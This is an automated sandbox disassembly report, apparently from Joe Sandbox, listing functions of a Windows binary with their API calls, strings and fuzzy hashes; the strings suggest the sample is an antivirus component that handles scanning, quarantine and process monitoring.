Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400048AD
EnterCriticalSection.KERNEL32 ref: 00000001400048BA
GetProcessHeap.KERNEL32 ref: 00000001400048F1
HeapFree.KERNEL32 ref: 0000000140004903
SetEvent.KERNEL32 ref: 0000000140004917
ResetEvent.KERNEL32 ref: 0000000140004924
LeaveCriticalSection.KERNEL32 ref: 0000000140004931
CloseHandle.KERNEL32 ref: 0000000140004943
CloseHandle.KERNEL32 ref: 0000000140004955
LeaveCriticalSection.KERNEL32 ref: 0000000140004962
DeleteCriticalSection.KERNEL32 ref: 000000014000496F
GetProcessHeap.KERNEL32 ref: 00000001400049A7
HeapFree.KERNEL32 ref: 00000001400049B9
GetProcessHeap.KERNEL32 ref: 00000001400049D5
HeapFree.KERNEL32 ref: 00000001400049E7

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
String ID:
API String ID: 1995290849-0
Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214

Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140002E63
LeaveCriticalSection.KERNEL32 ref: 0000000140002EE7
EnterCriticalSection.KERNEL32 ref: 0000000140002EF9
EnterCriticalSection.KERNEL32 ref: 0000000140002F35
LeaveCriticalSection.KERNEL32 ref: 0000000140002FC0
RegCreateKeyExW.ADVAPI32 ref: 000000014000300B
RegSetValueExW.ADVAPI32 ref: 000000014000304C
RegCloseKey.ADVAPI32 ref: 0000000140003057
LeaveCriticalSection.KERNEL32 ref: 0000000140003064

Strings

SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5
action, xrefs: 0000000140003020
?, xrefs: 0000000140002FFE

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrt.dll, xrefs: 0000000140002B7E
vseqrtInit, xrefs: 0000000140002BA3
vseqrtRelease, xrefs: 0000000140002BBA
vseqrtAdd, xrefs: 0000000140002BD5

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452
amps_Init: done, pHandle=%p, xrefs: 00000001400035CC

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

kernel32.dll, xrefs: 0000000140004D3C
SetDllDirectoryW, xrefs: 0000000140004D58

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17
ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6
doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012D2F
csm, xrefs: 0000000140012DC1
csm, xrefs: 0000000140012E97
bad exception, xrefs: 0000000140012E4A

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

